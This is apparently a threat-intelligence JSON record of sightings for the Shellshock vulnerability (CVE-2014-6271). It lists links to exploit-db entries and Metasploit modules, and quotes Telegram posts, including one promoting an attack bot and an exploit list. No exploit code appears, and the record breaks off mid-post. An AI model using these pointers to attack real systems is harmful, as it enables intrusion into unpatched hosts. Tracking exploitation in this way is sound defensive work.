{"vulnerability": "CVE-2014-6271", "sightings": [{"uuid": "8991f5e8-7de1-48d4-9d8e-7f53feec3fcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/542cffb9-6ef8-42cc-ab96-6404950d210b", "content": "", "creation_timestamp": "2014-10-02T07:35:22.000000Z"}, {"uuid": "e44f76a0-d690-4271-8308-36535bae0ae1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/552f547d-caf8-4b2b-860b-5e0ed54b8056", "content": "", "creation_timestamp": "2015-04-16T06:38:30.000000Z"}, {"uuid": "78c69e99-326d-43a9-8c05-fb498b36c89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/5535ffbe-a498-4c31-9974-3fc0d54b8056", "content": "", "creation_timestamp": "2015-04-21T07:46:05.000000Z"}, {"uuid": "d3904275-34d4-4f1e-aafb-6d544630d9d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/9a9801da-049b-4458-ab1c-7a892d5feb76", "content": "", "creation_timestamp": "2020-10-09T15:24:13.000000Z"}, {"uuid": "d8dbe57e-7b57-44cd-be6c-b4b9698f40cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/f181b6b6-93eb-43e6-8222-d4e22cda192c", "content": "", "creation_timestamp": "2020-10-09T16:57:28.000000Z"}, {"uuid": "5cb5642d-eb5d-47ca-8317-b2aa5e6afcee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:03.000000Z"}, {"uuid": "4ba44412-fbd6-4a57-aed6-1bd72d4f77be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://www.exploit-db.com/exploits/42938", "content": "", "creation_timestamp": "2017-10-02T00:00:00.000000Z"}, {"uuid": "a423fff8-c9b5-4557-9c68-f1ac29ccbab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://www.exploit-db.com/exploits/40938", "content": "", "creation_timestamp": "2016-12-18T00:00:00.000000Z"}, {"uuid": "26d55ed9-aa58-409f-ae68-b0bcb69fd198", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://www.exploit-db.com/exploits/39918", "content": "", "creation_timestamp": "2016-06-10T00:00:00.000000Z"}, {"uuid": "8bdaa82c-5327-42f7-915a-f70908e32517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://www.exploit-db.com/exploits/38849", "content": "", "creation_timestamp": "2015-12-02T00:00:00.000000Z"}, {"uuid": "ad897358-08e0-491d-8cd1-72bb23502c43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971228", "content": "", "creation_timestamp": "2024-12-24T20:26:11.671428Z"}, {"uuid": "92bf49fe-c516-4217-808a-def65628f7a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971229", "content": "", "creation_timestamp": "2024-12-24T20:26:12.477712Z"}, {"uuid": "7318b126-29ea-4652-acf9-d89d9a2228d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://bsky.app/profile/areenzor.bsky.social/post/3lflzqb5awk2g", "content": "", "creation_timestamp": "2025-01-13T05:43:27.873490Z"}, {"uuid": "ed7b4720-4d40-4d34-8151-fe4d7a2a541e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://bsky.app/profile/daffyduke.bsky.social/post/3lg3xaao26m2a", "content": "", "creation_timestamp": "2025-01-19T13:41:19.717626Z"}, {"uuid": "5c403775-fd66-4290-a68e-0595dd7e001d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:42.000000Z"}, {"uuid": "861e5d10-fdf9-461c-bed5-55387f66f62b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://gist.github.com/S1131/5d8917283842e71d7d693ebeb63a7f89", "content": "", "creation_timestamp": "2025-02-12T05:35:02.000000Z"}, {"uuid": "b32a03a9-7357-47bd-8f62-7198f993a372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2014-6271", "type": "seen", "source": "https://gist.github.com/zx0r/bcefa42ec1e60a0bc721a5c4175dab15", "content": "", "creation_timestamp": "2025-02-03T15:09:47.000000Z"}, {"uuid": "282bbb7d-e78c-45b7-b5c7-79a94b5f4757", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:06.000000Z"}, {"uuid": "5c6ae40f-e012-4ebe-a32b-4c658bdd21f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2014-6271", "type": "seen", "source": "https://gist.github.com/tauzen/e0a07a80095b49f1c46cdc8d09e52264", "content": "", "creation_timestamp": "2025-08-13T20:55:04.000000Z"}, {"uuid": "50a8bfb0-95a4-4c50-a526-92cb8ffb3cb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:09:31.000000Z"}, {"uuid": "f274d28f-aea6-4d50-875e-905d779ce027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://gist.github.com/edgarcosta/934eb264e54da84a497ce3f607ba247b", "content": "", "creation_timestamp": "2025-05-27T19:35:23.000000Z"}, {"uuid": "6c5171d3-ae3b-4621-ae9e-4f1824cf118e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2014-6271", "type": "seen", "source": "https://gist.github.com/Darksidesfear/38c018e6fb7a2a84e08d472725ae3985", "content": "", "creation_timestamp": "2025-05-10T20:42:08.000000Z"}, {"uuid": "21adedcc-9578-4a80-b0cf-506feeed5fe7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/smtp/qmail_bash_env_exec.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "0acf8ea0-3b54-42f7-a390-f13c8956bba0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-25)", "content": "", "creation_timestamp": "2025-07-25T00:00:00.000000Z"}, {"uuid": "14ab1baa-c2b0-49e5-b3c9-2a5dc40df41f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://rulezet.org/rule/detail_rule/40653", "content": "", "creation_timestamp": "2025-10-26T13:43:25.201017Z"}, {"uuid": "1ace1f5e-fd79-4aad-b6a2-6cc47c228b0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "MISP/a41d8549-5384-5e1a-8c33-bf88e35b5a0a", "content": "", "creation_timestamp": "2025-10-14T10:31:50.000000Z"}, {"uuid": "e124e050-e27f-411b-97e0-4fea0f1d44ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "f6c967de-c4e9-476c-a63f-83b4c07bd043", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://gist.github.com/meirdev/9456cc133c7718206f32c0d5528671a4", "content": "", "creation_timestamp": "2025-10-27T14:41:05.000000Z"}, {"uuid": "6ad5e102-4ec0-4dd3-a3cc-24615c2351e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "f9570ff4-c850-4642-ac9e-7319fc482306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/advantech_switch_bash_env_exec.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "4865d5bb-51e2-4400-91cd-99e8529be93f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "f75b1b4e-8812-4474-af53-e17496a18459", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ipfire_bashbug_exec.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "b57089b4-41a0-494a-9267-14e8314710b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "b2056680-480f-44b8-b1cd-00e244561310", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2014-6271", "type": "seen", "source": "https://gist.github.com/bretthowell714-source/33c41b92776ef881b518eb4e5b2a2203", "content": "", "creation_timestamp": "2026-01-08T18:46:02.000000Z"}, {"uuid": "9591dffc-9101-44d5-8b54-926a0146b479", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/cups_bash_env_exec.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "bfda59b7-5102-4abc-aa09-8bbe29a6d9dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "e740db2b-254e-4612-a0db-31c92306aaf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/dhcp/bash_environment.rb", "content": "", "creation_timestamp": "2018-05-29T15:50:33.000000Z"}, {"uuid": "94532946-33ef-4214-89a0-7388f6476413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://bsky.app/profile/f5labs.bsky.social/post/3m7q5oz2hrt2q", "content": "", "creation_timestamp": "2025-12-11T18:00:04.252961Z"}, {"uuid": "72e80ad7-b56b-4cf5-b618-ce4b62f4dc42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/G1YIpqTouZZ7RGRq-g0EK5R-A4RVmquYDNGd4eb7udpn90Y", "content": "", "creation_timestamp": "2025-06-14T15:00:07.000000Z"}, {"uuid": "2529f68e-e66a-413a-af99-355186ae9f85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/1f857002-8caa-404d-9436-d4dbb97eae47", "content": "", "creation_timestamp": "2026-02-02T12:28:26.293135Z"}, {"uuid": "67d34993-30e1-4bc8-ba93-273971796ef1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34839", "content": "", "creation_timestamp": "2014-10-01T00:00:00.000000Z"}, {"uuid": "370a1548-4359-40c2-b7af-cf34c9d77478", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/35115", "content": "", "creation_timestamp": "2014-10-29T00:00:00.000000Z"}, {"uuid": "a8d3c34f-cd5f-46bb-8d05-9f2920ef5175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34895", "content": "", "creation_timestamp": "2014-10-06T00:00:00.000000Z"}, {"uuid": "e51cebdd-6158-4864-a897-5f1538ea03e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34896", "content": "", "creation_timestamp": "2014-10-06T00:00:00.000000Z"}, {"uuid": "d54ff9c8-cfdc-4f08-bc24-6a387def1eb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34900", "content": "", "creation_timestamp": "2014-10-06T00:00:00.000000Z"}, {"uuid": "1f2bd9d4-e4bc-4616-8524-1ac5ee99e03c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34862", "content": "", "creation_timestamp": "2014-10-02T00:00:00.000000Z"}, {"uuid": "053680c0-7e78-4ade-b4ba-47a1ead5c9f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34765", "content": "", "creation_timestamp": "2014-09-25T00:00:00.000000Z"}, {"uuid": "2ffaa41c-1c26-489e-930a-58c4e6df45d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34766", "content": "", "creation_timestamp": "2014-09-25T00:00:00.000000Z"}, {"uuid": "0f1695fb-ffa9-4ad6-9ccc-7e66a473f404", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "db99543d-496c-4eef-ad0a-2df2093364df", "vulnerability": "CVE-2014-6271", "type": "confirmed", "source": "https://www.exploit-db.com/exploits/34777", "content": "", "creation_timestamp": "2014-09-25T00:00:00.000000Z"}, {"uuid": "d3274b51-1a5c-462f-91ef-5db65d8bf4ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/QXEVm7CRuLVb1xNoxUOSwrTnJ_CRu9kpmOAYRx2XayAcy58", "content": "", "creation_timestamp": "2025-12-05T21:00:04.000000Z"}, {"uuid": "e006de1b-68be-47bf-9ecb-9ae27783e1c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "seen", "source": "https://t.me/cmsbotinfo/58", "content": "Update Modules:\nBOT & WEB\n\nmodules /cve:\n\nCVE-2026-24061\nCVE-2021-26084\nCVE-2024-36401\nCVE-2014-6271\n\nmodules /wp:\n\nCVE-2026-0920\nCVE-2025-6934\nCVE-2025-29009\nCVE-2025-6389\nCVE-2025-14998\nCVE-2024-56043\n\nI know there are the old CVE, but trust me, it's still working in the real target..\ne.g: CVE-2014-6271\n\nif you have the request CVE to added to bot , just chat @CMSAssistant_bot\nit's support for any language espesially english.\n\nI will update the more CVE ( at the moment i will add more modules for wordpress and other general CVE) \ud83d\ude01", "creation_timestamp": "2026-02-17T15:25:49.000000Z"}, {"uuid": "7fe89f21-4f27-4884-b6d0-4a998fcf883a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "https://t.me/HackingPublicoficial/162", "content": "Best Exploits\n\nphpMoAdmin Remote Code Execution (CVE-2015-2208)\nLotusCMS Remote Code Execution (OSVDB-75095)\nElasticSearch Remote Code Execution (CVE-2015-1427)\nShellShock (httpd) Remote Code Execution (CVE-2014-6271)\nIISlap - http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)\nse0wned - Seowintech Router diagnostic.cgi remote root\nWPsh0pwn - Wordpress WPShop eCommerce Shell Upload (WPVDB-7830)\nnmediapwn - Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload\npwnflow - Wordpress Work the flow file upload 2.5.2 Shell Upload\ndelusions - Wordpress InfusionSoft Gravity Forms Shell Upload (CVE-2014-6446)\nsuiteshell - SuiteCRM Post-Auth Remote Code Execution (CVE-2015-NOTYET)\nsuiteracer - SuiteCRM Post-Auth Remote Code Execution Race Condition (CVE-2015-xxxx)\nunsanitary - Address Sanitizer + Setuid Binary = Local Root exploit (LD_PRELOAD vector)\nDiamondFox - DiamondFox Botnet C&C Panel Shell Upload\nDoubtfullyMalignant - BenignCertain DoS PoC\nTorCT-Shell - TorCT RAT C&C Panel Shell Upload\nvBullshit - vBulletin 5.x.x unserialize() Remote Code Execution (CVE-2015-7808)\nXanity-Shell - Xanity RAT C&C Panel Shell Upload\nJoomraa - PoC + upload blacklist bypass (CVE-2016-8869, CVE-2016-8870, CVE-2016-9836)\nDeathsize - LifeSize Room remote code execution & local root exploit\nAssetExploder - ManageEngine Asset Explorer remote code execution\nDroppleGanger - Droppler <= 1.6.5 Auth-Bypass & RCE\ntr-06fail - TR-064 Misimplementations leading to remote device takeover in ZyXEL Routers\nscreen2root - Screen 4.05.00 (CVE-2017-5618) local privesc\nFreeACS-Pwn - TR-069 exploit for FreeACS server, disclosed at BSides Edinburgh.\nJoomblah - Joomla 3.7.0 SQL Injection exploit (CVE-2017-8917)\npisspoorpool - Local file inclusion exploit for p2pool status page\nwipgpwn - Remote Root Exploit for WePresent WiPG-1000,1500,2000 devices\nTBA\n\nLink:\n\nhttps://github.com/XiphosResearch/exploits https://www.facebook.com/1656611301265857/posts/1887994441460874", "creation_timestamp": "2017-07-11T02:04:41.000000Z"}, {"uuid": "25595c3a-db7c-4b45-99bb-e73f6f052623", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/doyensec/detectors/CVE_2014_6271", "content": "", "creation_timestamp": "2025-09-16T08:34:13.000000Z"}, {"uuid": "fcd1931d-33cc-4957-b590-55145cb6d5e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "Telegram/koWg9picjaG2ToUTHmWZAVRmpkVaxUxcP1juXCV4e7L2qpk", "content": "", "creation_timestamp": "2026-04-02T09:00:05.000000Z"}, {"uuid": "f6a2510e-9896-4cf7-b41a-e11d8b4aba29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "Telegram/Ftk1rbbivPGb7VgW7Tp2b3XMUC9TfIyvsTRdgf-M3y_Yzw", "content": "", "creation_timestamp": "2021-01-21T22:27:12.000000Z"}, {"uuid": "6f1c80fd-710f-4186-ab61-baca911df227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/eiq80vTfK0uEvpSaVkLstXl9YEDfyEgGUyA39bKhe3J3sOM", "content": "", "creation_timestamp": "2026-04-24T09:00:04.000000Z"}, {"uuid": "71ae2270-e5c8-4a6b-8da3-1ecfec701b92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "https://t.me/bhhub/885", "content": "Today's Must-Read Bug Bounty Writeups\n\n\u2728 ShellShock: Bash Vulnerability Exploits & Mitigation \nA deep dive into ShellShock (CVE-2014-6271), showing how attackers abuse environment variable parsing in Bash to execute arbitrary code. The article explains real-world exploitation scenarios, including web server CGI attacks, and provides defensive techniques like prompt updating of Bash versions and strict input validation. Read more \n\n\u2728 API Hacking Guide: 2025 Edition \nThis comprehensive guide covers API security from authentication bypasses to GraphQL batching attacks, with updated techniques for modern web architectures. It highlights OAuth misconfigurations and serverless API vulnerabilities that are trending in bug bounty programs. Read more \n\n\u2728 Race Condition Bug Exploitation Walkthrough \nDetailed analysis of three unique TOCTOU (Time-of-Check-Time-of-Use) vulnerabilities, demonstrating how timing windows in file operations and database transactions can lead to privilege escalation. The author shares unconventional exploitation methods that bypass common race condition mitigations. Read more \n\n@bhhub", "creation_timestamp": "2025-08-20T13:37:56.000000Z"}, {"uuid": "cd2e7f09-331d-4d80-b514-29e8b8188314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "published-proof-of-concept", "source": "Telegram/UcOXFA8nSOttq6tnEv5GYCOJTlyoQN894TbAmd-Usu-nlPU", "content": "", "creation_timestamp": "2026-04-22T15:00:07.000000Z"}, {"uuid": "15d4b80a-8cd6-4392-a5ac-14a65a9fa98d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2014-6271", "type": "exploited", "source": "https://t.me/webamoozir/1398", "content": "\u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc Shellshock \u0647\u0645\u0686\u0646\u0627\u0646 \u0622\u0633\u0627\u0646 \u0648 \u0627\u0631\u0632\u0627\u0646! \n@webamoozir\n\u06a9\u0627\u0631\u0634\u0646\u0627\u0633\u0627\u0646 \u0622\u06cc \u0628\u06cc \u0627\u0645 \u0645\u06cc \u06af\u0648\u06cc\u0646\u062f \u06a9\u0647 \u0627\u0632 \u06cc\u0627\u0641\u062a \u0634\u062f\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc Shellshock \u0686\u06cc\u0632\u06cc \u0628\u06cc\u0634 \u0627\u0632 \u062f\u0648 \u0633\u0627\u0644 \u0648 \u0646\u06cc\u0645 \u0634\u0647\u0631\u06cc\u0648\u0631 \u0645\u0627\u0647 93 - \u06af\u0630\u0634\u062a\u0647 \u0627\u0633\u062a \u0648 \u0631\u062e\u0646\u0647\u06af\u0631\u0627\u0646 \u0647\u0645\u0686\u0646\u0627\u0646 \u0627\u0632 \u0622\u0646 \u0628\u0647\u0631\u0647\u062c\u0648\u06cc\u06cc \u0645\u06cc\u06a9\u0646\u0646\u062f \u0632\u06cc\u0631\u0627 \u0628\u0647\u0631\u0647 \u062c\u0648\u06cc\u06cc \u0627\u0632 \u0622\u0646\u060c \u0628\u0633\u06cc\u0627\u0631 \u0622\u0633\u0627\u0646 \u0648 \u0627\u0631\u0632\u0627\u0646 \u0627\u0633\u062a \u0648 \u062f\u0631 \u062e\u0637 \u0641\u0631\u0645\u0627\u0646 \u067e\u06cc\u0634 \u0641\u0631\u0636 \u0633\u0627\u0645\u0627\u0646\u0647 \u0647\u0627\u06cc \u0644\u06cc\u0646\u0648\u06a9\u0633 \u0648 \u06cc\u0648\u0646\u06cc\u06a9\u0633 \u0647\u0633\u062a. \u0647\u0631 \u0631\u062e\u0646\u0647\u06af\u0631\u06cc \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0647\u0631\u0647\u062c\u0648\u06cc\u06cc \u06a9\u0631\u062f\u0647\u060c 